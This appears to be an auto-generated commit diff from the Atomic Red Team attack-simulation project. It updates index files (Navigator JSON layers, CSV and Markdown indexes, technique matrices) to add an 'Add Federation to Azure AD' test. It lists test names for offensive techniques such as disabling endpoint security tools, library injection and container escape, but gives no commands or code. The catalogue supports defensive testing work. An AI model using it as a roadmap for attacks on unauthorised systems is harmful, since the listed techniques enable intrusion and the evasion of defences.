security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2021-11-03 18:57:08 +00:00
parent 50a76a233c
commit 717757d539
11 changed files with 269 additions and 13 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
+1 -1
View File
@@ -1 +1 @@
{"version":"4.2","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1606.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1606","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}
{"version":"4.2","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1484.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1484","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"},{"techniqueID":"T1606.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"},{"techniqueID":"T1606","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+2
View File
@@ -178,6 +178,7 @@ privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hij
privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
privilege-escalation,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -368,6 +369,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defende
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
178 privilege-escalation T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
179 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
180 privilege-escalation T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
181 privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
182 privilege-escalation T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
183 privilege-escalation T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
184 privilege-escalation T1055.001 Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
369 defense-evasion T1562.001 Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
370 defense-evasion T1562.001 Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
371 defense-evasion T1562.001 Disable or Modify Tools 25 office-365-Disable-AntiPhishRule b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 powershell
372 defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
373 defense-evasion T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
374 defense-evasion T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
375 defense-evasion T1055.001 Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
atomics/Indexes/Indexes-CSV/linux-index.csv
+2
View File
@@ -46,6 +46,7 @@ privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa0
privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
@@ -99,6 +100,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7
defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
46 privilege-escalation T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
47 privilege-escalation T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
48 privilege-escalation T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
49 privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
50 privilege-escalation T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
51 privilege-escalation T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
52 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
100 defense-evasion T1562.001 Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
101 defense-evasion T1562.001 Disable or Modify Tools 4 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
102 defense-evasion T1562.001 Disable or Modify Tools 25 office-365-Disable-AntiPhishRule b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 powershell
103 defense-evasion T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
104 defense-evasion T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
105 defense-evasion T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
106 defense-evasion T1070.004 File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
atomics/Indexes/Indexes-Markdown/index.md
+4 -2
View File
@@ -300,7 +300,8 @@
- Atomic Test #2: Activate Guest Account [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
@@ -601,7 +602,8 @@
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
atomics/Indexes/Indexes-Markdown/linux-index.md
+4 -2
View File
@@ -125,7 +125,8 @@
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
@@ -224,7 +225,8 @@
- Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
atomics/Indexes/Matrices/linux-matrix.md
+2 -2
View File
@@ -12,7 +12,7 @@
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Escape to Host](../../T1611/T1611.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Account](../../T1087.001/T1087.001.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Python](../../T1059.006/T1059.006.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -23,7 +23,7 @@
| | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
atomics/Indexes/Matrices/matrix.md
+2 -2
View File
@@ -28,7 +28,7 @@
| | [Scheduled Task](../../T1053.005/T1053.005.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
